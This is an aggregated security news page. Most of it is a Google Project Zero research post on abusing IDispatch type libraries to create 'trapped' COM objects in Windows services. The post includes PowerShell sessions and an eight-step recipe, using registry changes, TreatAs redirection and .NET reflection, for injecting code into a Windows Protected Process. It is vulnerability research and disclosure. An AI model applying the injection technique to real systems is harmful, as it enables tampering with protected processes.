Backdoor found in two healthcare patient monitors, linked to IP in China

Bleeping Computer - 31 Leden, 2025 - 00:31
The US Cybersecurity and Infrastructure Security Agency (CISA) is warning that Contec CMS8000 devices, a widely used healthcare patient monitoring device, include a backdoor that quietly sends patient data to a remote IP address and downloads and executes files on the device. [...]
Kategorie: Hacking & Security

Coming soon — a fully open reconstruction of Deepseek-R1

Computerworld.com [Hacking News] - 30 Leden, 2025 - 22:13

The Deepseek-R1 model has managed to attract a lot of attention in a short time, especially because it can be used commercially without restrictions.

Now, developers at Hugging Face are trying to reconstruct the generative AI (genAI) model from scratch and develop an alternative to Deepseek-R1 called Open-R1 based on open source code. Although Deepseek is often referred to as an open model, parts of it are not completely open.

“Ensuring that the entire architecture behind R1 is open source is not just about transparency, but about unlocking its full potential,” developer Elie Bakouch, of Hugging Face, told Techcrunch.

In the long run, Open-R1 could make it easier to create genAI models without sharing data with other actors.

Kategorie: Hacking & Security

Google blocked 2.36 million risky Android apps from Play Store in 2024

Bleeping Computer - 30 Leden, 2025 - 21:57
Google blocked 2.3 million Android app submissions to the Play Store in 2024 due to violations of its policies that made them potentially risky for users. [...]
Kategorie: Hacking & Security

Is Apple Intelligence 2.0 on track?

Computerworld.com [Hacking News] - 30 Leden, 2025 - 19:54

Earlier this week, we learned about Apple’s decision to appoint Kim Vorrath, the vice president of the company’s Technology Development Group (TDG), to help build Apple Intelligence under the supervision of John Giannandrea, Apple’s senior vice president for machine learning and AI.

Vorrath, who also serves at a board member at the National Center for Women in IT and sits on the Industrial Advisory Board at Cal Poly, has been with Apple since 1987. She’s taken leadership roles in iOS and OS X — she was even in charge of macOS at one time. Part of the original iPhone development team, she also supervised OS development for iPad, Mac and Vision Pro.

When it comes to bug testing and software quality control, she can say which features are ready to go and which are not. Vorrath also coordinates releases, not just for the specific platform (such as iPhone), but between devices, which means a great deal when you consider how integrated the Apple ecosystem has become.

Getting the band together

That established talent will be critical, given that Apple Intelligence features are also designed to work across the Apple ecosystem.

Of course, making these complex high tech products work well together takes effective organization. Vorrath brings that. She seems to be a person who can organize engineering groups and design effective workflows to optimize what those teams can do. With all these achievements, it is no surprise Vorrath is seen as one of the women who contributed the most to making Apple great.

In her new role, she joins Giannandrea, who allegedly “needs additional help managing an AI group with growing prominence,” Bloomberg reported.

Put it all together and it’s clear that Vorrath is one of Apple’s top fixers and joins the AI team at a critical point. First, she’s probably going to help get a new contextually-aware Siri out the door, and second, she’ll be making decisions around what happens in the next major iterations of Apple Intelligence.

It’s the next steps for Apple’s AI that I think have been missed in much of the coverage of this internal Apple shuffle. 

Apple Intelligence 2.0

While people like to focus on Siri’s improvements and shortcomings, it must also be true that Apple hopes to maintain its traditional development cadence when it comes to Apple Intelligence.

That means delivering additional features and feature improvements every year, usually at WWDC. With the next WWDC looming fast, it might fall to Vorrath to select what additions are made, and to ensure they get developed on time.

Think logically and you can see why that matters. Apple announced Apple Intelligence at WWDC 2024, but it wasn’t ready to ship alongside the original release of operating system updates, and features were slowly introduced in the following months. 

Arguably, the schedule didn’t matter. What does matter is that Apple, then seen as falling behind in AI, used Apple intelligence to argue for its own continued corporate relevance. It bought itself some time.

Now it must follow up on that time. That means making improvements and additions to show continued momentum. It comes down to delivering solutions consumers will want to use, with a little Apple magic alongside new developer tools to extend that ecosystem.

It has to succeed in doing this to maintain credibility in AI.

Is Apple going to keep relevant?

Getting that right — particularly across all Apple’s platforms and in good time — is challenging, and is most likely why Vorrath has been brought in. There’s so much riding on getting the mix right. Apple needs to be able to say “Hey, We’re not done yet with Apple Intelligence,” and back that claim up with tools to keep users’ interest. Those new AI services need to work well, ship on time, and work so people won’t even know how much they needed them until they use them.

Getting that mix right is going to take skill, dedication, and discipline. In the coming months, all eyes will be on Apple as critics and competitors wait to find out whether Apple Intelligence was a one shot attempt at maintaining relevance, or the first steps of a great company about to find its AI feet.

Making sure it is the second, and not the first, should be the fundamental mission Vorrath has taken on in her new role. 

You can follow me on social media! Join me on BlueSky,  LinkedInMastodon, and MeWe

Kategorie: Hacking & Security

Windows Bug Class: Accessing Trapped COM Objects with IDispatch

Project Zero - 30 Leden, 2025 - 18:57
@import url(https://themes.googleusercontent.com/fonts/css?kit=XGMkxXUZTA64h2imyzu79g);ol.lst-kix_to636nf8kaap-4.start{counter-reset:lst-ctn-kix_to636nf8kaap-4 0}ol.lst-kix_s9l3chg8etv0-3.start{counter-reset:lst-ctn-kix_s9l3chg8etv0-3 0}.lst-kix_to636nf8kaap-3>li{counter-increment:lst-ctn-kix_to636nf8kaap-3}.lst-kix_to636nf8kaap-7>li:before{content:"" counter(lst-ctn-kix_to636nf8kaap-7,lower-latin) ". "}.lst-kix_to636nf8kaap-6>li:before{content:"" counter(lst-ctn-kix_to636nf8kaap-6,decimal) ". "}.lst-kix_to636nf8kaap-3>li:before{content:"" counter(lst-ctn-kix_to636nf8kaap-3,decimal) ". "}.lst-kix_to636nf8kaap-5>li:before{content:"" counter(lst-ctn-kix_to636nf8kaap-5,lower-roman) ". "}ol.lst-kix_s9l3chg8etv0-6.start{counter-reset:lst-ctn-kix_s9l3chg8etv0-6 0}.lst-kix_to636nf8kaap-4>li:before{content:"" counter(lst-ctn-kix_to636nf8kaap-4,lower-latin) ". "}.lst-kix_to636nf8kaap-1>li:before{content:"" counter(lst-ctn-kix_to636nf8kaap-1,lower-latin) ". "}ol.lst-kix_to636nf8kaap-0.start{counter-reset:lst-ctn-kix_to636nf8kaap-0 0}.lst-kix_s9l3chg8etv0-3>li{counter-increment:lst-ctn-kix_s9l3chg8etv0-3}ol.lst-kix_s9l3chg8etv0-7.start{counter-reset:lst-ctn-kix_s9l3chg8etv0-7 0}.lst-kix_to636nf8kaap-2>li:before{content:"" counter(lst-ctn-kix_to636nf8kaap-2,lower-roman) ". "}ol.lst-kix_to636nf8kaap-7.start{counter-reset:lst-ctn-kix_to636nf8kaap-7 0}.lst-kix_to636nf8kaap-8>li{counter-increment:lst-ctn-kix_to636nf8kaap-8}.lst-kix_to636nf8kaap-0>li:before{content:"" counter(lst-ctn-kix_to636nf8kaap-0,decimal) ". "}.lst-kix_s9l3chg8etv0-8>li{counter-increment:lst-ctn-kix_s9l3chg8etv0-8}ol.lst-kix_s9l3chg8etv0-2.start{counter-reset:lst-ctn-kix_s9l3chg8etv0-2 0}.lst-kix_s9l3chg8etv0-2>li{counter-increment:lst-ctn-kix_s9l3chg8etv0-2}.lst-kix_s9l3chg8etv0-5>li{counter-increment:lst-ctn-kix_s9l3chg8etv0-5}ol.lst-kix_to636nf8kaap-8.start{counter-reset:lst-ctn-kix_to636nf8kaap-8 0}ol.lst-kix_to636nf8kaap-1.start{counter-reset:lst-ctn-kix_to636nf8kaap-1 0}ol.lst-kix_s9l3chg8etv0-5.start{counter-reset:lst-ctn-kix_s9l3chg8etv0-5 0}ol.lst-kix_s9l3chg8etv0-8.start{counter-reset:lst-ctn-kix_s9l3chg8etv0-8 0}.lst-kix_to636nf8kaap-0>li{counter-increment:lst-ctn-kix_to636nf8kaap-0}ol.lst-kix_s9l3chg8etv0-5{list-style-type:none}ol.lst-kix_s9l3chg8etv0-6{list-style-type:none}.lst-kix_s9l3chg8etv0-7>li:before{content:"" counter(lst-ctn-kix_s9l3chg8etv0-7,lower-latin) ". "}.lst-kix_s9l3chg8etv0-8>li:before{content:"" counter(lst-ctn-kix_s9l3chg8etv0-8,lower-roman) ". "}ol.lst-kix_s9l3chg8etv0-3{list-style-type:none}ol.lst-kix_s9l3chg8etv0-4{list-style-type:none}ol.lst-kix_s9l3chg8etv0-7{list-style-type:none}ol.lst-kix_s9l3chg8etv0-8{list-style-type:none}.lst-kix_to636nf8kaap-6>li{counter-increment:lst-ctn-kix_to636nf8kaap-6}.lst-kix_s9l3chg8etv0-3>li:before{content:"" counter(lst-ctn-kix_s9l3chg8etv0-3,decimal) ". "}.lst-kix_s9l3chg8etv0-7>li{counter-increment:lst-ctn-kix_s9l3chg8etv0-7}ol.lst-kix_s9l3chg8etv0-1.start{counter-reset:lst-ctn-kix_s9l3chg8etv0-1 0}ol.lst-kix_s9l3chg8etv0-1{list-style-type:none}.lst-kix_s9l3chg8etv0-1>li:before{content:"" counter(lst-ctn-kix_s9l3chg8etv0-1,lower-latin) ". "}.lst-kix_s9l3chg8etv0-2>li:before{content:"" counter(lst-ctn-kix_s9l3chg8etv0-2,lower-roman) ". "}ol.lst-kix_s9l3chg8etv0-2{list-style-type:none}ol.lst-kix_s9l3chg8etv0-0{list-style-type:none}.lst-kix_s9l3chg8etv0-0>li{counter-increment:lst-ctn-kix_s9l3chg8etv0-0}.lst-kix_s9l3chg8etv0-0>li:before{content:"" counter(lst-ctn-kix_s9l3chg8etv0-0,decimal) ". "}.lst-kix_to636nf8kaap-1>li{counter-increment:lst-ctn-kix_to636nf8kaap-1}ol.lst-kix_s9l3chg8etv0-4.start{counter-reset:lst-ctn-kix_s9l3chg8etv0-4 0}ol.lst-kix_to636nf8kaap-5.start{counter-reset:lst-ctn-kix_to636nf8kaap-5 0}ol.lst-kix_to636nf8kaap-2.start{counter-reset:lst-ctn-kix_to636nf8kaap-2 0}.lst-kix_to636nf8kaap-5>li{counter-increment:lst-ctn-kix_to636nf8kaap-5}.lst-kix_s9l3chg8etv0-6>li{counter-increment:lst-ctn-kix_s9l3chg8etv0-6}ol.lst-kix_to636nf8kaap-8{list-style-type:none}ol.lst-kix_to636nf8kaap-3.start{counter-reset:lst-ctn-kix_to636nf8kaap-3 0}.lst-kix_to636nf8kaap-2>li{counter-increment:lst-ctn-kix_to636nf8kaap-2}ol.lst-kix_to636nf8kaap-3{list-style-type:none}ol.lst-kix_to636nf8kaap-2{list-style-type:none}ol.lst-kix_to636nf8kaap-1{list-style-type:none}ol.lst-kix_to636nf8kaap-0{list-style-type:none}.lst-kix_to636nf8kaap-7>li{counter-increment:lst-ctn-kix_to636nf8kaap-7}ol.lst-kix_to636nf8kaap-7{list-style-type:none}ol.lst-kix_to636nf8kaap-6{list-style-type:none}li.li-bullet-0:before{margin-left:-18pt;white-space:nowrap;display:inline-block;min-width:18pt}ol.lst-kix_to636nf8kaap-5{list-style-type:none}ol.lst-kix_to636nf8kaap-4{list-style-type:none}.lst-kix_to636nf8kaap-4>li{counter-increment:lst-ctn-kix_to636nf8kaap-4}ol.lst-kix_s9l3chg8etv0-0.start{counter-reset:lst-ctn-kix_s9l3chg8etv0-0 0}.lst-kix_s9l3chg8etv0-4>li{counter-increment:lst-ctn-kix_s9l3chg8etv0-4}.lst-kix_s9l3chg8etv0-4>li:before{content:"" counter(lst-ctn-kix_s9l3chg8etv0-4,lower-latin) ". "}ol.lst-kix_to636nf8kaap-6.start{counter-reset:lst-ctn-kix_to636nf8kaap-6 0}.lst-kix_s9l3chg8etv0-5>li:before{content:"" counter(lst-ctn-kix_s9l3chg8etv0-5,lower-roman) ". "}.lst-kix_s9l3chg8etv0-6>li:before{content:"" counter(lst-ctn-kix_s9l3chg8etv0-6,decimal) ". "}.lst-kix_s9l3chg8etv0-1>li{counter-increment:lst-ctn-kix_s9l3chg8etv0-1}.lst-kix_to636nf8kaap-8>li:before{content:"" counter(lst-ctn-kix_to636nf8kaap-8,lower-roman) ". "}ol{margin:0;padding:0}table td,table th{padding:0}.ROKGfcMygP-c6{color:#000000;font-weight:400;text-decoration:none;vertical-align:baseline;font-size:11pt;font-family:"Arial";font-style:normal}.ROKGfcMygP-c11{padding-top:18pt;padding-bottom:6pt;line-height:1.5;page-break-after:avoid;orphans:2;widows:2;text-align:left}.ROKGfcMygP-c2{padding-top:0pt;padding-bottom:0pt;line-height:1.5;orphans:2;widows:2;text-align:left}.ROKGfcMygP-c7{color:#000000;text-decoration:none;vertical-align:baseline;font-style:normal}.ROKGfcMygP-c3{text-decoration-skip-ink:none;-webkit-text-decoration-skip:none;color:#1155cc;text-decoration:underline}.ROKGfcMygP-c17{color:#434343;font-weight:400;font-size:11pt;font-family:"Arial"}.ROKGfcMygP-c9{text-decoration:none;vertical-align:baseline;font-style:normal}.ROKGfcMygP-c15{font-weight:400;font-size:16pt;font-family:"Arial"}.ROKGfcMygP-c0{font-size:9pt;font-weight:400;font-family:"Roboto Mono"}.ROKGfcMygP-c16{background-color:#ffffff;max-width:468pt;padding:72pt 72pt 72pt 72pt}.ROKGfcMygP-c4{color:#188038;font-weight:400;font-family:"Roboto Mono"}.ROKGfcMygP-c14{margin-left:36pt;padding-left:0pt}.ROKGfcMygP-c12{color:#1967d2}.ROKGfcMygP-c13{font-style:italic}.ROKGfcMygP-c5{color:#188038}.ROKGfcMygP-c8{height:11pt}.ROKGfcMygP-c1{color:#37474f}.ROKGfcMygP-c10{color:#c5221f}.title{padding-top:0pt;color:#000000;font-size:26pt;padding-bottom:3pt;font-family:"Arial";line-height:1.5;page-break-after:avoid;orphans:2;widows:2;text-align:left}.subtitle{padding-top:0pt;color:#666666;font-size:15pt;padding-bottom:16pt;font-family:"Arial";line-height:1.5;page-break-after:avoid;orphans:2;widows:2;text-align:left}li{color:#000000;font-size:11pt;font-family:"Arial"}p{margin:0;color:#000000;font-size:11pt;font-family:"Arial"}h1{padding-top:20pt;color:#000000;font-size:20pt;padding-bottom:6pt;font-family:"Arial";line-height:1.5;page-break-after:avoid;orphans:2;widows:2;text-align:left}h2{padding-top:18pt;color:#000000;font-size:16pt;padding-bottom:6pt;font-family:"Arial";line-height:1.5;page-break-after:avoid;orphans:2;widows:2;text-align:left}h3{padding-top:16pt;color:#434343;font-size:14pt;padding-bottom:4pt;font-family:"Arial";line-height:1.5;page-break-after:avoid;orphans:2;widows:2;text-align:left}h4{padding-top:14pt;color:#666666;font-size:12pt;padding-bottom:4pt;font-family:"Arial";line-height:1.5;page-break-after:avoid;orphans:2;widows:2;text-align:left}h5{padding-top:12pt;color:#666666;font-size:11pt;padding-bottom:4pt;font-family:"Arial";line-height:1.5;page-break-after:avoid;orphans:2;widows:2;text-align:left}h6{padding-top:12pt;color:#666666;font-size:11pt;padding-bottom:4pt;font-family:"Arial";line-height:1.5;page-break-after:avoid;font-style:italic;orphans:2;widows:2;text-align:left}

Posted by James Forshaw, Google Project Zero

Object orientated remoting technologies such as DCOM and .NET Remoting make it very easy to develop an object-orientated interface to a service which can cross process and security boundaries. This is because they're designed to support a wide range of objects, not just those implemented in the service, but any other object compatible with being remoted. For example, if you wanted to expose an XML document across the client-server boundary, you could use a pre-existing COM or .NET library and return that object back to the client. By default when the object is returned it's marshaled by reference, which results in the object staying in the out-of-process server.

This flexibility has a number of downsides, one of which is the topic of this blog, the trapped object bug class. Not all objects which can be remoted are necessarily safe to do so. For example, the previously mentioned XML libraries, in both COM and .NET, support executing arbitrary script code in the context of an XSLT document. If an XML document object is made accessible over the boundary, then the client could execute code in the context of the server process, which can result in privilege escalation or remote-code execution.

There are a number of scenarios that can introduce this bug class. The most common is where an unsafe object is shared inadvertently. An example of this was CVE-2019-0555. This bug was introduced because when developing the Windows Runtime libraries an XML document object was needed. The developers decided to add some code to the existing XML DOM Document v6 COM object which exposed the runtime specific interfaces. As these runtime interfaces didn't support the XSLT scripting feature, the assumption was this was safe to expose across privilege boundaries. Unfortunately a malicious client could query for the old IXMLDOMDocument interface which was still accessible and use it to run an XSLT script and escape a sandbox.

Another scenario is where there exists an asynchronous marshaling primitive. This is where an object can be marshaled both by value and by reference and the platform chooses by reference as the default mechanism, For example the FileInfo and DirectoryInfo .NET classes are both serializable, so can be sent to a .NET remoting service marshaled by value. But they also derive from the MarshalByRefObject class, which means they can be marshaled by reference. An attacker can leverage this by sending to the server a serialized form of the object which when deserialized will create a new instance of the object in the server's process. If the attacker can read back the created object, the runtime will marshal it back to the attacker by reference, leaving the object trapped in the server process. Finally the attacker can call methods on the object, such as creating new files which will execute with the privileges of the server. This attack is implemented in my ExploitRemotingService tool.

The final scenario I'll mention as it has the most relevancy to this blog post is abusing the built in mechanisms the remoting technology uses to lookup and instantiate objects to create an unexpected object. For example, in COM if you can find a code path to call the CoCreateInstance API with an arbitrary CLSID and get that object passed back to the client then you can use it to run arbitrary code in the context of the server. An example of this form is CVE-2017-0211, which was a bug which exposed a Structured Storage object across a security boundary. The storage object supports the IPropertyBag interface which can be used to create an arbitrary COM object in the context of the server and get it returned to the client. This could be exploited by getting an XML DOM Document object created in the server, returned to the client marshaled by reference and then using the XSLT scripting feature to run arbitrary code in the context of the server to elevate privileges.

Where Does IDispatch Fits In?

The IDispatch interface is part of the OLE Automation feature, which was one of the original use cases for COM. It allows for late binding of a COM client to a server, so that the object can be consumed from scripting languages such as VBA and JScript. The interface is fully supported across process and privilege boundaries, although it's more commonly used for in-process components such as ActiveX.

To facilitate calling a COM object at runtime the server must expose some type information to the client so that it knows how to package up parameters to send via the interface's Invoke method. The type information is stored in a developer-defined Type Library file on disk, and the library can be queried by the client using the IDispatch interface's GetTypeInfo method. As the COM implementation of the type library interface is marshaled by reference, the returned ITypeInfo interface is trapped in the server and any methods called upon it will execute in the server's context.

The ITypeInfo interface exposes two interesting methods that can be called by a client, Invoke and CreateInstance. It turns out Invoke is not that useful for our purposes, as it's not supported for remoting, it can only be called if the type library is loaded in the current process. However, CreateInstance is implemented as remotable, this will instantiate a COM object from a CLSID by calling CoCreateInstance. Crucially the created object will be in the server's process, not the client.

However, if you look at the linked API documentation there is no CLSID parameter you can pass to CreateInstance, so how does the type library interface know what object to create? The ITypeInfo interface represents any type which can be present in a type library. The type returned by GetTypeInfo just contains information about the interface the client wants to call, therefore calling CreateInstance will just return an error. However, the type library can also store information of "CoClass" types. These types define the CLSID of the object to create, and so calling CreateInstance will succeed.

How can we go from the interface type information object, to one representing a class? The ITypeInfo interface provides us with the GetContainingTypeLib method which returns a reference to the containing ITypeLib interface. That can then be used to enumerate all supported classes in the type library. It's possible one or more of the classes are not safe if exposed remotely. Let's go through a worked example using my OleView.NET PowerShell module, first we want to find some target COM services which also support IDispatch. This will give us potential routes for privilege escalation.

PS> $cls = Get-ComClass -Service

PS> $cls | % { Get-ComInterface -Class $_ | Out-Null }

PS> $cls | ? { $true -in $_.Interfaces.InterfaceEntry.IsDispatch } | 

        Select Name, Clsid

Name                                       Clsid

----                                       -----

WaaSRemediation                            72566e27-1abb-4eb3-b4f0-eb431cb1cb32

Search Gathering Manager                   9e175b68-f52a-11d8-b9a5-505054503030

Search Gatherer Notification               9e175b6d-f52a-11d8-b9a5-505054503030

AutomaticUpdates                           bfe18e9c-6d87-4450-b37c-e02f0b373803

Microsoft.SyncShare.SyncShareFactory Class da1c0281-456b-4f14-a46d-8ed2e21a866f

The -Service switch for Get-ComClass returns classes which are implemented in local services. We then query for all the supported interfaces, we don't need the output from this command as the queried interfaces are stored in the Interfaces property. Finally we select out any COM class which exposes IDispatch resulting in 5 candidates. Next, we'll pick the first class, WaasRemediation and inspect its type library for interesting classes.

PS> $obj = New-ComObject -Clsid 72566e27-1abb-4eb3-b4f0-eb431cb1cb32

PS> $lib = Import-ComTypeLib -Object $obj

PS> Get-ComObjRef $lib.Instance | Select ProcessId, ProcessName

ProcessId ProcessName

--------- -----------

    27020 svchost.exe

PS> $parsed = $lib.Parse()

PS> $parsed

Name               Version TypeLibId

----               -------- ---------

WaaSRemediationLib 1.0      3ff1aab8-f3d8-11d4-825d-00104b3646c0

PS> $parsed.Classes | Select Name, Uuid

Name                          Uuid

----                          ----

WaaSRemediationAgent          72566e27-1abb-4eb3-b4f0-eb431cb1cb32

WaaSProtectedSettingsProvider 9ea82395-e31b-41ca-8df7-ec1cee7194df

The script creates the COM object and then uses the Import-ComTypeLib command to get the type library interface. We can check that the type library interface is really running out of process by marshaling it with Get-ComObjRef then extracting the process information, showing it running in an instance of svchost.exe which is the shared service executable. Inspecting the type library through the interface is painful, to make it easier to display what classes are supported, we can parse the library into an easier to use object model with the Parse method. We can then dump information about the library, including a list of its classes.

Unfortunately for this COM object the only classes the type library supports are already registered to run in the service and so we've gained nothing. What we need is a class that is only registered to run in the local process, but is exposed by the type library. This is a possibility as a type library could be shared by both local in-process components and an out-of-process service.

I inspected the other 4 COM classes (one of which is incorrectly registered and isn't exposed by the corresponding service) and found no useful classes to try and exploit. You might decide to give up at this point, but it turns out there are some classes accessible, they're just hidden. This is because a type library can reference other type libraries, which can be inspected using the same set of interfaces. Let's take a look:

PS> $parsed.ReferencedTypeLibs

Name   Version TypeLibId

----   ------- ---------

stdole 2.0     00020430-0000-0000-c000-000000000046

PS> $parsed.ReferencedTypeLibs[0].Parse().Classes | Select Name, Uuid

Name       Uuid

----       ----

StdFont    0be35203-8f91-11ce-9de3-00aa004bb851

StdPicture 0be35204-8f91-11ce-9de3-00aa004bb851

PS> $cls = Get-ComClass -Clsid 0be35203-8f91-11ce-9de3-00aa004bb851

PS> $cls.Servers

           Key Value

           --- -----

InProcServer32 C:\Windows\System32\oleaut32.dll

In the example we can use the ReferencedTypeLibs property to show what type libraries were encountered when the library was parsed. We can see a single entry for the stdole which is basically always going to be imported. If you're lucky, maybe there's other libraries that are imported that you can inspect. We can parse the stdole library to inspect its list of classes. There's two classes that are exported by the type library, if we inspect the servers for StdFont we can see that it is only specified to be creatable in process, we now have a target class to look for bugs. To get an out of process interface for the stdole type library we need to find a type which references it. The reason for the reference is that common interfaces such as IUnknown and IDispatch are defined in the library, so we need to query the base type of an interface we can directly access.  Let's try to create the object in the COM service.

PS> $iid = $parsed.Interfaces[0].Uuid

PS> $ti = $lib.GetTypeInfoOfGuid($iid)

PS> $href = $ti.GetRefTypeOfImplType(0)

PS> $base = $ti.GetRefTypeInfo($href)

PS> $stdole = $base.GetContainingTypeLib()

PS> $stdole.Parse()

Name   Version TypeLibId

----   ------- ---------

stdole 2.0     00020430-0000-0000-c000-000000000046

PS> $ti = $stdole.GetTypeInfoOfGuid("0be35203-8f91-11ce-9de3-00aa004bb851")

PS> $font = $ti.CreateInstance()

PS> Get-ComObjRef $font | Select ProcessId, ProcessName

ProcessId ProcessName

--------- -----------

    27020 svchost.exe

PS>  Get-ComInterface -Object $Obj

Name                 IID                                  HasProxy   HasTypeLib

----                 ---                                  --------   ----------

...

IFont                bef6e002-a874-101a-8bba-00aa00300cab True       False

IFontDisp            bef6e003-a874-101a-8bba-00aa00300cab True       True

We query the base type of an existing interface through a combination of GetRefTypeOfImplType and GetRefTypeInfo, then use GetContainingTypeLib to get the referenced type library interface. We can parse the library to be confident that we've got the stdole library. Next we get the type info for the StdFont class and call CreateInstance. We can inspect the object's process to ensure it was created out of process, the results shows its trapped in the service process. As a final check we can query for the object's interfaces to prove that it's a font object.

Now we just need to find a way of exploiting one of these two classes, the first problem is only the StdFont object can be accessed. The StdPicture object does a check to prevent it being used out of process. I couldn't find useful exploitable behavior in the font object, but I didn't spend too much time looking. Of course, if anyone else wants to look for a suitable bug in the class then go ahead.

This research was therefore at a dead end, at least as far as system services go. There might be some COM server accessible from a sandbox but an initial analysis of ones accessible from AppContainer didn't show any obvious candidates. However, after thinking a bit more about this I realized it could be useful as an injection technique into a process running at the same privilege level. For example, we could hijack the COM registration for StdFont, to point to any other class using the TreatAs registry key. This other class would be something exploitable, such as loading the JScript engine into the target process and running a script.

Still, injection techniques are not something I'd usually discuss on this blog, that's more in the realm of malware. However, there is a scenario where it might have interesting security implications. What if we could use this to inject into a Windows Protected Process? In a strange twist of fate, the WaaSRemediationAgent class we've just been inspecting might just be our ticket to ride:

PS> $cls = Get-ComClass -Clsid 72566e27-1abb-4eb3-b4f0-eb431cb1cb32

PS> $cls.AppIDEntry.ServiceProtectionLevel

WindowsLight

When we inspect the protection level for the hosting service it's configured to run at the PPL-Windows level! Let's see if we can salvage some value out of this research.

Protected Process Injection

I've blogged (and presented) on the topic of injecting into Windows Protected Processes before. I'd recommend re-reading that blog post to get a better background of previous injection attacks. However, one key point is that Microsoft does not consider PPL a security boundary and so they won't generally fix any bugs in a security bulletin in a timely manner, but they might choose to fix it in a new version of Windows.

The idea is simple, we'll redirect the StdFont class registration to point to another class so that when we create it via the type library it'll be running the protected process. Choosing to use StdFont should be more generic as we could move to using a different COM server if WaaSRemediationAgent is removed. We just need a suitable class which gets us arbitrary code execution which also works in a protected process.

Unfortunately this immediately rules out any of the scripting engines like JScript. If you've re-read my last blog post, the Code Integrity module explicitly blocks the common script engines from loading in a protected process. Instead, I need a class which is accessible out of process and can be loaded into a protected process. I realized one option is to load a registered .NET COM class. I've blogged about how .NET DCOM is exploitable, and shouldn't be used, but in this case we want the buggyness.

The blog post discussed exploiting serialization primitives, however there was a much simpler attack which I exploited by using the System.Type class over DCOM. With access to a Type object you could perform arbitrary reflection and call any method you liked, including loading an assembly from a byte array which would bypass the signature checking and give full control over the protected process.

Microsoft fixed this behavior, but they left a configuration value, AllowDCOMReflection, which allows you to turn it back on again. As we're not elevating privileges, and we have to be running as an administrator to change the COM class registration information, we can just enable DCOM reflection in the registry by writing the AllowDCOMReflection with the DWORD value of 1 to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework key before loading the .NET framework into the protected process.

The following steps need to be taken to achieve injection:

  1. Enable DCOM reflection in the registry.
  2. Add the TreatAs key to redirect StdFont to the System.Object COM class.
  3. Create the WaaSRemediationAgent object.
  4. Use the type library to get the StdFont class type info.
  5. Create a StdFont object using the CreateInstance method which will really load the .NET framework and return an instance of the System.Object class.
  6. Use .NET reflection to call the System.Reflection.Assembly::Load method with a byte array.
  7. Create an object in the loaded assembly to force code to execute.
  8. Cleanup all registry changes.

You'll need to do these steps in a non .NET language as otherwise the serialization mechanisms will kick in and recreate the reflection objects in the calling process. I wrote my PoC in C++, but you can probably do it from things like Python if you're so inclined. I'm not going to make the PoC available but the code is very similar to the exploit I wrote for CVE-2014-0257, that'll give you an example of how to use DCOM reflection in C++. Also note that the default for .NET COM objects is to run them using the v2 framework which is no longer installed by default. Rather than mess around with getting this working with v4 I just installed v2 from the Windows components installer.

My PoC worked first-time on Windows 10, but unfortunately when I ran it on Windows 11 24H2 it failed. I could create the .NET object, but calling any method on the object failed with the error TYPE_E_CANTLOADLIBRARY. I could have stopped here, having proven my point but I wanted to know what was failing on Windows 11. Lets finish up with diving into that, to see if we could do something to get it to work on the latest version of Windows.

The Problem with Windows 11

I was able to prove that the issue was related to protected processes, if I changed the service registration to run unprotected then the PoC worked. Therefore there must be something blocking the loading of the library when specifically running in a protected process. This didn't seem to impact type libraries generally, the loading of stdole worked just fine, so it was something specific to .NET.

After inspecting the behavior of the PoC with Process Monitor it was clear the mscorlib.tlb library was being loaded to implement the stub class in the server. For some reason it failed to load, which prevented the stub from being created, which in turn caused any call to fail. At this point I had an idea of what's happening. In the previous blog post I discussed attacking the NGEN COM process by modifying the type library it used to create the interface stub to introduce a type-confusion. This allowed me to overwrite the KnownDlls handle and force an arbitrary DLL to get loaded into memory. I knew from the work of Clément Labro and others that most of the attacks around KnownDlls are now blocked, but I suspected that there was also some sort of fix for the type library type-confusion trick.

Digging into oleaut32.dll I found the offending fix, the VerifyTrust method is shown below:

NTSTATUS VerifyTrust(LoadInfo *load_info) {

  PS_PROTECTION protection;

  BOOL is_protected;

 

  CheckProtectedProcessForHardening(&is_protected, &protection);

  if (!is_protected)

    return SUCCESS;

  ULONG flags;

  BYTE level;

  HANDLE handle = load_info->Handle;

  NTSTATUS status = NtGetCachedSigningLevel(handle, &flags, &level, 

                                            NULL, NULL, NULL);

  if (FAILED(status) || 

     (flags & 0x182) == 0 || 

     FAILED(NtCompareSigningLevels(level, 12))) {

    status = NtSetCachedSigningLevel(0x804, 12, &handle, 1, handle);

  }

  return status;

}

This method is called during the loading of the type library. It's using the cached signing level, again something I mentioned in the previous blog post, to verify if the file has a signing level of 12, which corresponds to Windows signing level. If it doesn't have the appropriate cached signing level the code will try to use NtSetCachedSigningLevel to set it. If that fails it assumes the file can't be loaded in the protected process and returns the error, which results in the type library failing to load. Note, a similar fix blocks the abuse of the Running Object Table to reference an out-of-process type library, but that's not relevant to this discussion.

Based on the output from Get-AuthenticodeSignature the mscorlib.tlb file is signed, admittedly with a catalog signing. The signing certificate is Microsoft Windows Production PCA 2011 which is exactly the same certificate as the .NET Runtime DLL so there should be no reason it wouldn't get a Windows signing level. Let's try and set the cached signature level manually using my NtObjectManager PowerShell module to see if we get any insights:

PS> $path = "C:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.tlb"

PS> Set-NtCachedSigningLevel $path -Flags 0x804 -SigningLevel 12 -Win32Path

Exception calling "SetCachedSigningLevel" with "4" argument(s): "(0xC000007B) - {Bad Image}

%hs is either not designed to run on Windows or it contains an error. Try installing the program again using the

original installation media or contact your system administrator or the software vendor for support. Error status 0x"

PS> Format-HexDump $path -Length 64 -ShowAll

          00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F  - 0123456789ABCDEF

-----------------------------------------------------------------------------

00000000: 4D 53 46 54 02 00 01 00 00 00 00 00 09 04 00 00  - MSFT............

00000010: 00 00 00 00 43 00 00 00 02 00 04 00 00 00 00 00  - ....C...........

00000020: 25 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00  - %...............

00000030: 2E 0D 00 00 33 FA 00 00 F8 08 01 00 FF FF FF FF  - ....3...........

Setting the signing level gives us the STATUS_INVALID_IMAGE_FORMAT error. Looking at the first 64 bytes of type library file shows that it's a raw type library rather than packaged in a PE file. This is fairly uncommon on Windows, even when a file has the extension TLB it's common for the type library to still be packed into a PE file as a resource. I guess we're out of luck, unless we can set a cached signing level on the file, it will be blocked from loading into the protected process and we need it to load to support the stub class to call the .NET interfaces over DCOM.

As an aside, oddly I have a VM of Windows 11 with the non-DLL form of the type library which does work to set a cached signing level. I must have changed the VM's configuration in some way to support this feature, but I've no idea what that is and I've decided not to dig further into it.

